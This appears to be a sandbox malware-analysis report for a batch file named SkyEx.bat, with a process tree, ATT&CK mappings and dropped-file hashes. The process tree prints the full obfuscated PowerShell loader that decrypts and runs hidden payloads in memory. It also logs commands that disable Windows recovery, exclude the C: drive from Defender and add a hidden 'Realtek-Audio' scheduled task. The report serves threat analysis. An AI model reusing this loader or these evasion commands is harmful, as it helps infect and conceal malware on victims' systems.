$bcVJf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DxlNL=$bcVJf.EntryPoint; $DxlNL.Invoke($null, $param2_var);}$uXxHb = 'C:\Users\Admin\AppData\Local\Temp\29d329b6-f5cc-4388-82b5-22858b06dabe_ijxc5u5xgmq.zip.abe\SkyEx.bat';$host.UI.RawUI.WindowTitle = $uXxHb;$XQMBy = [type]::GetType('System.IO.File');$FgQjL = [type]::GetType('System.Environment');$tmYtz = $XQMBy::('txeTllAdaeR'[-1..-11] -join '')($uXxHb);$boaBv = $FgQjL::NewLine;$RlMCC = $tmYtz.Split($boaBv);$kAnVS = $RlMCC;foreach ($XiygM in $kAnVS) { if ($XiygM.StartsWith(':: ')) { $RyZZZ=$XiygM.Substring(3); break; }}$payloads_var=[string[]]$RyZZZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:756
- - C:\Windows\system32\reagentc.exe
    "reagentc.exe" /disable
    3⤵
    - Drops file in Windows directory
    PID:1776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\au2unkakajw11.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:736
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\39769c36-6e22-4539-8a16-1da027c0f6f5_ijxc5u5xgmq.zip.6f5\SkyEx.bat" "
1⤵
PID:4180
- C:\Windows\system32\net.exe
  net file
  2⤵
  PID:4308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:4268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NK6bq8FTaxkS+8MUh8Y/Oy9u1+T3SxyOrCm5Piq2uFU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PqRgyhlZl/qIszxCOfOwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GtoBs=New-Object System.IO.MemoryStream(,$param_var); $qTHmx=New-Object System.IO.MemoryStream; $BrbIX=New-Object System.IO.Compression.GZipStream($GtoBs, [IO.Compression.CompressionMode]::Decompress); $BrbIX.CopyTo($qTHmx); $BrbIX.Dispose(); $GtoBs.Dispose(); $qTHmx.Dispose(); $qTHmx.ToArray();}function execute_function($param_var,$param2_var){ $bcVJf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DxlNL=$bcVJf.EntryPoint; $DxlNL.Invoke($null, $param2_var);}$uXxHb = 'C:\Users\Admin\AppData\Local\Temp\39769c36-6e22-4539-8a16-1da027c0f6f5_ijxc5u5xgmq.zip.6f5\SkyEx.bat';$host.UI.RawUI.WindowTitle = $uXxHb;$XQMBy = [type]::GetType('System.IO.File');$FgQjL = [type]::GetType('System.Environment');$tmYtz = $XQMBy::('txeTllAdaeR'[-1..-11] -join '')($uXxHb);$boaBv = $FgQjL::NewLine;$RlMCC = $tmYtz.Split($boaBv);$kAnVS = $RlMCC;foreach ($XiygM in $kAnVS) { if ($XiygM.StartsWith(':: ')) { $RyZZZ=$XiygM.Substring(3); break; }}$payloads_var=[string[]]$RyZZZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3384
- - C:\Windows\system32\reagentc.exe
    "reagentc.exe" /disable
    3⤵
    - Drops file in Windows directory
    PID:3584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\njfjhrmj4ii10.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1568
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\njfjhrmj4ii10.vbs"
    3⤵
    - Checks computer location settings
    PID:116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\njfjhrmj4ii10.bat" "
      4⤵
      PID:1188
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        
        PID:5020
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:3344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NK6bq8FTaxkS+8MUh8Y/Oy9u1+T3SxyOrCm5Piq2uFU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PqRgyhlZl/qIszxCOfOwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GtoBs=New-Object System.IO.MemoryStream(,$param_var); $qTHmx=New-Object System.IO.MemoryStream; $BrbIX=New-Object System.IO.Compression.GZipStream($GtoBs, [IO.Compression.CompressionMode]::Decompress); $BrbIX.CopyTo($qTHmx); $BrbIX.Dispose(); $GtoBs.Dispose(); $qTHmx.Dispose(); $qTHmx.ToArray();}function execute_function($param_var,$param2_var){ $bcVJf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DxlNL=$bcVJf.EntryPoint; $DxlNL.Invoke($null, $param2_var);}$uXxHb = 'C:\Users\Admin\AppData\Local\Realtek-Hub\njfjhrmj4ii10.bat';$host.UI.RawUI.WindowTitle = $uXxHb;$XQMBy = [type]::GetType('System.IO.File');$FgQjL = [type]::GetType('System.Environment');$tmYtz = $XQMBy::('txeTllAdaeR'[-1..-11] -join '')($uXxHb);$boaBv = $FgQjL::NewLine;$RlMCC = $tmYtz.Split($boaBv);$kAnVS = $RlMCC;foreach ($XiygM in $kAnVS) { if ($XiygM.StartsWith(':: ')) { $RyZZZ=$XiygM.Substring(3); break; }}$payloads_var=[string[]]$RyZZZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3688
      - C:\Windows\system32\reagentc.exe
        
        "reagentc.exe" /disable
        6⤵
        Drops file in Windows directory
        
        PID:4508
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
0e137c3bf90c8b8eb2aa9e4bbb687323

SHA1
cdb0d3e4818d107ebc483f9525410ca3da99186c

SHA256
72a009f49ebf0529924d048009d4eed20a9fd7d836bec7e79e76065aace6bb1b

SHA512
29ca68a63a11214f2f5ef6f40823c287f46378730caed740cd18e8a3717d4750c9e9b60c03628bf09e861c4fdd819e40f196684b17ce5d798c6d980d98e17cf2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
1e2c498a510826323b1b540d9c9a9816

SHA1
ff81913989d464af6f63f960371e77c61edacd62

SHA256
c2ffc02d8d4eab5cf7e7f2601ab206b4f5e52706bed40682cc66b96b930514ea

SHA512
0e391f349b481f25862284021959748f858cc3cadbf1b4d09496d1b107a27e32452c0b45e3aab4b27d1cc60aebcbfc7ff1d9cb8854d77e2b623130e61534ba66

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
524B

MD5
ac7a332a3b95553f6107b302f1afdd38

SHA1
37f283be439b7266bed5bd1756e9b0bf8eb14691

SHA256
0ad0272235513939f2738e55d03a28f690d2dfa7089b44a1bd21739b0548bb4d

SHA512
20ee15f6f0f6ea6d20a3b9efec153a99abd71a99eb5e5b9b2d86b817acfba41e1adab49e37d6919992ccda121e005bd7a9f59c2aa9ecb6b58a9e080cd98696b3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
80341b076bd881085dce003c516f65e9

SHA1
f0308fcbdf38893e091bbba183294252f5793577

SHA256
e5a7ab5c4299fb3385d969be2e890ce7cd46fdbab0c9cbfe9cc3ee848a80edc6

SHA512
e2134ea30d30298788e1b9f3ed76ec3b35cdb03db8494c303a3516fd34eafb8ab217d1b25c17c9de8ca927893f046f9d029ee5a1e2664ad252cc0c63e87c73ec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
29895ce60c5b36551e2518915369ac85

SHA1
54051c7aeb8c5876754de6c02bcca0223f74c3fa

SHA256
1b87ec8eefc6901d16a1ff4ce0e3461690ffcb80aa5580eec16768caa3b2939c

SHA512
6327cd53cce9bdeb5b2a5ab8427f4d8bf22108df600a41a6ea8b55d9b8f82a307b22530b0c4599e684f83c74368a72a4960afba5642aa895308a87d19b539132

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e551e4d35737ef056acb1c4bb78bb6f9

SHA1
7502daad82184ead27979bc72e8f94181446a635

SHA256
46a747908fcf46fb7664f445292d4b950e92151ce9efbc3bbcce8681eecfff82

SHA512
8b834df20f3e906f560c038356c09fb572e6c4b21a7bba3fd0c8216b7203ff6353bb818aceee3fec0baead81a3e26af9f607d830ea16e63ce9e06dfcfda47043

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
fab35cebdd7e27c3d555165b5cc182ad

SHA1
3690d2b4adc5b2f05610c2a085d2bd08dde0bcf3

SHA256
0af9d5f173b2067305f2ad1ef995a68b0576a5eba8d774ba73ca8c7e3ddf3160

SHA512
f054a3f780fe8c19d90e83ed006897ad9e3043372cd8ee68e7b19dff27d997334aff2eb56da04427740613bd3cce71ccd660d901bb51e8b1d860d0e21082ee76

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2de7a0b86f201f65a99ecad2100ab962

SHA1
0914ba1288cb33bc8130038e22ab9a0e16a8796c

SHA256
70e64468764fcf4a9276a7911756afccf897212fa189b4cfc6ad4eba044f5ab8

SHA512
80f4ed133bcc880b46e2b20e401b2088e449c9074a23eca4e34abfd1a54061fc87d540a974e6d404aea497f8f74c8a88af1ea309c86511b1848a665bbc9c6226

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
dc47d7016c27c14a8591e174416980f1

SHA1
9b5c877e91fc79933604de5840434c4d45173bdc

SHA256
79cc066a5495c4e15fff5a29cfc8787de41b1106cb16610f6ef1341d36a4dee7

SHA512
28561eb384252800905ed067faf1d045eea313dfd318b5478a7c567450780f85691139372ab35bdf5268b13673de79b89c90ea5ce40457e5c8972379d9ee0277

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
a8d13bd5aa557858517bba635a32fca8

SHA1
ceabc82391ce765a5de2e33289684de38acaf609

SHA256
d8979f61108dd952a3a1e0f137040e765088d4d748742b47a8fbf3aad7653760

SHA512
6e1aac679d409d91d8405dcfea1261d5b91f78c8ac7132c4ca608f6ce17d58f3da61edeae5ce8668a2b05422590ed5bd16b4b0278d47c61256dbeb3d89e20595

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
122KB

MD5
9bec8d5fa0675d85ddcd089077857d5d

SHA1
5158291779851a2210ef1cd8aca1071decfe1f11

SHA256
1c2463afa225324810bf83f9cadd91fd2890c7a00dfd734508f1c8afe8ef7508

SHA512
b8ab0478c9728b55095d3aec63a8627b4621c259fd3f6006396f4541a481a1df1965d3400a3eb9c8d4eb82adaca431005b463784f07a7bc11684cf2c0ae288e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
831f4873fa210167a4fce44134d19f80

SHA1
d17b2d791368fd772d8ee391aad0987770cff3ff

SHA256
05aec6246646855a18051de3cd92e623023b8aa20f86abc9fcf75c897d17772a

SHA512
032c1343cf16ca44b319fdb53b9d80a0fb290dfbe5a5e2a2d571ecce087adf1dedf4b6abf7206e20d7f94d0f8cb110a3d1a95930face08f5773544a55b138215

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
162KB

MD5
7604870c6c65e58e291a8875add2ed99

SHA1
588f4a61db52d291bf73ecd2136317ea08283357

SHA256
089df052abf94795c97222443913a574ae08c4b25a3deb6d7c5c638f8cc89164

SHA512
89f6742316e3e1cb0e7f9f08d1a6e7ebe2eed1f986d84d1841cd51fdb4cb3b838eae92c10cab07fc451009b6652919e8621518d2483f2f1f4dae6c4e209bcfb9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
f6052e6bf5ef6a88419300fc9be996fc

SHA1
ee4b39c3de9b725d60b6d879e55ff561c293d20d

SHA256
cbca918a13202090c644722c9d4120702d6512b5c9e48d0b81145bbc4e9fbfd5

SHA512
af036330d3f877137be7a60de8a4713a763b7d52a96a00e95514092853cdc500b6e4f4b14acb641050c8db16eb6ff6eda3d6fc9de3bcccd5c43390f119d9cef9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a9d5a55646a268805a98533fe53dd0c0

SHA1
8e870960de2f16d5688b6d7d8d9f88507220bd8f

SHA256
04f95e259d0a862c42bbf0b81e79cf760a8e223781cb4259f8ca8127d41fe488

SHA512
94a9ac797018a1ca784edffa7452a66b48d46f853904e3789ac0693b6d350a0ab64c3b72e7aa0e33ab884b54c0c87ad3444b41e6fa484eb3159b97fb4424a5e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f7d75685f22b9f5c2e031c30235e7457

SHA1
d4abf2c3b056a8afff52ad1b5cf58eda43d7ccf1

SHA256
1a1adbdcd63f9b8f2de96dc632da91c872914bee49a27ff5f1c615478b3a2e9d

SHA512
b0c969ad2a767a048be88bddc9a2974c2e9c115750d252b02dc90364c656bb5831dd14b6cee32230ff8b0d657626ba542d6c461ea44e8cd2671abdfb76269c4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0f59cccd39a3694e0e6dfd44d0fa76d

SHA1
fccd7911d463041e1168431df8823e4c4ea387c1

SHA256
70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

SHA512
5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
438f7ee10c8a4d22dc7c15abb572fc65

SHA1
75fb1bcac3f8311987a62f14312e2dccf25cc339

SHA256
8d572eefdc4eb4dfa7e71c40d0f6d8d0739ca917c7779ad20359b36f9ff43234

SHA512
4c0cf5f90bbc6b409fda1bd24fbdd44328add0f959b647dd443c0f0d25b4688fe6afa2051dc58ac4017da21d6ed27ec0db892b9ff4e7852d78af1b94cb221035

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fe3ae76dbed28cfd6ce3202f9ccdf6d8

SHA1
c4fae29f6440c755d68ea630fe805811dc808a5d

SHA256
699b9a9d049c7e01f417b3a69f6c546521da227cbf576d2870eb0652545ccaf3

SHA512
c3d80d4f74de0681c637f7c1303603218735a7656e8c555a1f89b4214e0abe739f2cfa3d1330e9a2c73b514b55e05df115874a53831344a49e832d4a7aa7894a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f13461195b049aecbed62579f19d9255

SHA1
a5494c5f797faf38fa88d5bc160a77952a1e3a21

SHA256
58671d2e63925ba5948347b53b9bbeb905ced7a923d844ee2288e91636f98e1b

SHA512
7973aea496653e73df46a23ab97243bfa47e133016e47579fa7ecab4402bfbcad4cc1c8ad69ba5073ad829dc3b52e5d82c17893ee3d31b3c2452c18dd1d17208

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0b4c753070e7ae6269b0706626942e3

SHA1
201236b71ef5dd72b224d9d1dcc96ef6c20cdbd9

SHA256
0779424800c7c6d0f29de4125f183ff463d14c110e74c976defb93cd302703e2

SHA512
9834d4f27f3be7e308b2802f55b792ee73cc0750d3af6be94e0da180b68a03214d0864f738a6f6436d430b2e3add83067aca6b30eb71268552a9f4272b21a420

Download Submit
C:\Users\Admin\AppData\Local\Realtek-Hub\au2unkakajw11.vbs

Filesize
118B

MD5
8e9d23890ce8c1fe3f40368b4eee40b9

SHA1
572335632c7d8488026884aded7d0dd0b3396b65

SHA256
79ffdf5be2f874d5692ad4657aa24f48e1fb2bfef2c87ad2c2aa63a0bc301cb9

SHA512
6577c6e1a737131aad242e5f43162aacce5c129d91b403e89e20d9acdfea5785fff8e0d8c8fabbd6ebb69b64dd44895e59f100849e66aca80751297cdc25637f

Download Submit
C:\Users\Admin\AppData\Local\Realtek-Hub\ngkzs5rn0az8.vbs

Filesize
117B

MD5
d2148c01c8ab5948d7a44579ace814e5

SHA1
a5ae4bcae69628964d98b5b96f1028cf242d68dd

SHA256
f6ad0e60932632e6c16039aaf0264848a0b784cc4691de37798f02116c8a1bf4

SHA512
1967191096382b2eb3fb99cae1621387a463e61f720ec49243652f3b095311261b8f3ade2b52565c33442ef35f7ca85fdf68c8af24ad8bd8e48822e34949940c

Download Submit
C:\Users\Admin\AppData\Local\Realtek-Hub\njfjhrmj4ii10.vbs

Filesize
118B

MD5
596a92c55fee4317ce1c795e4e27d4bd

SHA1
c2922f972e9c4cb5f50ed1101fe1ca736faccdce

SHA256
730150bcbc5c5ccb8bc7ff984fa1279a4dbf6df9ce35008af1c488863c07cc56

SHA512
19a755d42805d1f191204686532bbcd8f4e6bee396a9432f177f7786b843d0b0233520a091d512cc59405efe4be5947d9d0eae4a352aa3bbed485ef8340f86e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hyr2w1dj.bcy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
2KB

MD5
615d15d0dcf4ce1fc860a4bb53f414b8

SHA1
9c8b8cc5b3b3450ba5693fdb09c322d1ac0abb42

SHA256
d011085e584e99d40b01f9e3402a3e7afaa7504b3f8e392794fb6186d9027ab4

SHA512
e6c7a832c32357a0c4d870b5d14cb176567e5c2e5d266c61d133f61f4a49ec679ada2f7f86ead7819a54472c6f3dd624ff9a8b4821f7b86de35bf0fea5304d35

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
4KB

MD5
ab139f8fdf04bd5f1ea3ed0dff16de49

SHA1
edebfcb0fc5cd8df570f3ac5b290c871a9336687

SHA256
ced0bd211a5a36bf8fd16da7e65adb35e49adffec832ee1058aa87aac6cb0b9e

SHA512
8d848602ae623a59f54f19cd5473296ab5818f7bf523489551e4ea77ee1685efb1f0c3bb14ab212114f56f32ebd74b92ef3a624e662a07527c88b463f3630bd5

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
6KB

MD5
ebd88984753e889939cb7a41c2d652b5

SHA1
3a543e1b2895caeda0ed1eeefaa83e5ab1b12d41

SHA256
2f139f1957c6adade2a1266918487d96b1bc8729b84fe20c75a4c6da40dec45e

SHA512
7424a6dfb9cdcf62c24c7b99546de1f0104619e3c1b9cf1bd58692e2460b497be383366ca9a4aa9248727502aa42f0468076bdcf8dda2adc802dcdc4bdef307d

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
7KB

MD5
8df886e52421692ad840dfbc080b976a

SHA1
76adaecfcd8ffc37fb5947b2671700ed0faa0acc

SHA256
28da53d33fe3ebaa3114ec9fc9b15b810c5b93dcf15d5c4ceb8d09045d5ea996

SHA512
ea244711a6f63f5e027f439fac71a0f998b68baba80f7b6f01c6b1229a09a170760ab304b0676349125bf0a278d3c442f80a9ed48ebbf11999059c1c7b7735fd

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
12KB

MD5
bc6b3e7c9632b2371b5470781cef432a

SHA1
74e61025e173edc77edb06c0d5338bf11454d2d6

SHA256
3375446f42540c25a989f8470040ec761bc60aba359574f55de1715b4a3ad987

SHA512
f05c6e4fb44338487f5e14e52c9424c10359c6f4c3a9fe019308b585cb4b9bf804a7ade1a3bab9d72b8e3a8ea5a7b9e6cfc6a0fa480dba225f4c775c6bdd4067

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
13KB

MD5
ba513c4e2c855178a5729a38abed6c4a

SHA1
25a385ed3a24fec36beb6fa2a239823f0c1194c8

SHA256
e086b01cafe150a891389b79e732d067f9f1882ef42ac32d5b3e4dfeb7c90d02

SHA512
fcfb04390767b9fa0f193c67f007b6cfb3689842dfc4c160f18b4affe811a3d75c2f16853df7f4af9b9d8ad5bec8e89a83cb076f96404e1e5f6c947562a04a2b

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
15KB

MD5
f8c63e3c899a3c13cd661831bb8da4a8

SHA1
71fc42838c8390687be1dfaa9b3fb87054ad49b0

SHA256
ffcf662afaedb9ebe41f09afa7db1a4f6a96c482defd6ae8f9034ca7f6e55c9a

SHA512
62b85e55ed90e7383ab9edf16824d4965c7b6522f0edd33bedee619e503b282a3e015f674c87d06bdec6474c5ed8d7ebb73bf1a724416185cdbdcf5353f5274c

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
17KB

MD5
82ddabf04d7ef19e49493ffec362c11f

SHA1
0bb0e4b81ec5e393d35089c8df01ea4e0faabae1

SHA256
f92d95337f9893d9ed61c1f41ec01d82fead3dbbf9d26cce3f468ad8b7013871

SHA512
d04a1cfc35e29ba6c5b4c2dd78406331d606b7d06e237483b8c71512d518da361145c570bec05ff2de26e9196a4340154f4bf3f3e7ed7e1f41f594743eec1008

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
19KB

MD5
b602a1324dc063d9ff0591135e7ec241

SHA1
acf1544e8cdad97f087ae6341b12b396bc6e447c

SHA256
a84e24c303baee35ed97a912f8558cd6bbfa74f680591494a82d57e5f9a9428e

SHA512
605ae0543ee7674893e342bfec0a8fd8c96c026cdccba3d92e40ce3caf80b192c9574ca38981abb989788ceeb3d19611b3828771da3ad558748260ee8d93c8f8

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
12KB

MD5
093aa1f949609e31792710a122d3c1ce

SHA1
0e1ff9b732c131aa2f927f9339ca2527463d8c63

SHA256
847d5dae7079258178a8102b46977e285a647e463b99db5fec7b61b4a90078b6

SHA512
2a44e97c6a418bdd83e4022e7f1563b71db69014a85b04b6ca36302725e0ea83f66dff4bc0edc025d0ad0f65cc475f24e5c78f8425ddb2741dcabd817d63c353

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
14KB

MD5
0a0852a21ed9dc96dce94638a825c3c5

SHA1
6a16f04e13b54df2c18dd963c59f852a1138f674

SHA256
b74d91c7c122ab3a54313edf4ddabc643adcebed4475a79174b6d2fcb9fed1b3

SHA512
aa8c7d0c5fd42f69085ad76a29351a11b41a72d6296957931f5153c9877520967d7b3feb5cc944577bb56216d758ea02e07b6244760495131a8269b97e8304f9

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
19KB

MD5
dbaddae54c3829023d51303dbe5329de

SHA1
45b2b3f6fe76818473f6eff60aa2ca7c0efaccc8

SHA256
789c4a2d88e9d0afdad9c86d38db62f2621688aef2691d9dcb6f450b7dd11dd9

SHA512
88dcbe47bfe4bb48588424a67482cae1552ed6e199ea800687bcde8ca36b0a7046e56768f6a148033fb2654e0aca0d160e3c43ae18d2fb357032b4760ff503fa

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
22KB

MD5
fa0f08b0abc047dcb2b42f8d16dd5a09

SHA1
1ebe361e5de238a930337071a7094d000936860a

SHA256
8dfe524aca957e3ce0882497df7a5ee498b44573abbc3e254656a832839beab4

SHA512
